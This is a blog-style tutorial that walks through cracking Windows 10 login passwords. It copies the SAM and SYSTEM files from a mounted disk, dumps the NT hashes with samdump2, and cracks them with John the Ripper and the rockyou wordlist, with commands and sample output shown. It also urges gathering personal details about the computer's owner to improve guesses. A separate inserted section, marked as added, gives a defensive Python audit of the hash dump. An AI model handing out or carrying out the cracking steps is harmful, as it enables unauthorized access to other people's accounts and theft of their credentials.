Cracking Windows 10 passwords with John the Ripper on Kali Linux 2016.

Cracking the SAM file in Windows 10 is easy with Kali Linux. Use a Live Kali Linux DVD and mount the Windows 10 partition.

Firstly, get the SAM and SYSTEM files from the C:\Windows\System32\config folder. Copy these to your desktop directory.

Then dump the password hashes.

root@kali:~/Desktop# samdump2 SYSTEM SAM -o out

Now grab the rockyou.txt wordlist.

root@kali:~/Desktop# zcat /usr/share/wordlists/rockyou.txt.gz > rock.txt

Now I am attempting to crack the Windows user password.

root@kali:~/Desktop# john out --format=nt --wordlist=rock.txt

If this is successful, output like the following should be printed.

root@kali:~/Desktop# john out -format=nt -wordlist rock.txt 
Warning: invalid UTF-8 seen reading rock.txt
Using default input encoding: UTF-8
Loaded 54 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
password         ()
                 (*disabled* Administrator)
2g 0:00:00:00 DONE (2016-03-24 12:30) 200.0g/s 354600p/s 354600c/s 18442KC/s dirk..sss
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now cat the john.pot file; it should contain the cracked passwords.

root@kali:~/Desktop# cat ~/.john/john.pot 

If the password is in the wordlist, it should be cracked. This is easy, but the wordlist needs to be very large indeed to increase the possibility of cracking the password. Get as much information about the computer owner as possible. They might have used the name of their pet or loved one.
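A defensive audit of the same dump that samdump2 writes, as an added example that is not part of the original post: NT hashes are unsalted (john reports "no different salts"), so blank and shared passwords can be flagged by comparing hashes, without cracking anything. The sample dump is constructed, and the names parse_dump and audit are assumptions of this example.

```python
"""Audit a pwdump-style dump (the format samdump2 writes) without cracking it."""
from collections import defaultdict

# Well-known NT hash of the empty string: an account carrying it has no password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in user:rid:lm:nt::: form. The alice/bob/carol NT hashes are
# made up; the other values are the standard empty-string LM and NT hashes.
SAMPLE_DUMP = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:0123456789ABCDEF0123456789ABCDEF:::
carol:1003:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
kiosk:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

def parse_dump(text):
    """Return one dict per account; blank or malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue
        disabled = fields[0].startswith("*disabled* ")
        user = fields[0][len("*disabled* "):] if disabled else fields[0]
        accounts.append({"user": user, "rid": int(fields[1]),
                         "nt": fields[3].lower(), "disabled": disabled})
    return accounts

def audit(accounts):
    """Flag blank passwords and enabled accounts whose NT hashes are identical."""
    enabled = [a for a in accounts if not a["disabled"]]
    by_hash = defaultdict(list)
    for a in enabled:
        by_hash[a["nt"]].append(a["user"])
    shared = [sorted(u) for h, u in by_hash.items() if len(u) > 1 and h != EMPTY_NT]
    return {
        "blank_password": sorted(a["user"] for a in enabled if a["nt"] == EMPTY_NT),
        "disabled_blank": sorted(a["user"] for a in accounts if a["disabled"] and a["nt"] == EMPTY_NT),
        "shared_password": sorted(shared),
    }

if __name__ == "__main__":
    for finding, users in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {users}")
```

The disabled_blank entries correspond to the empty-password "(*disabled* Administrator)" line in the john output above; blank_password and shared_password are the findings to fix first.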

There is a directory here that contains a few very large wordlists.

More here:
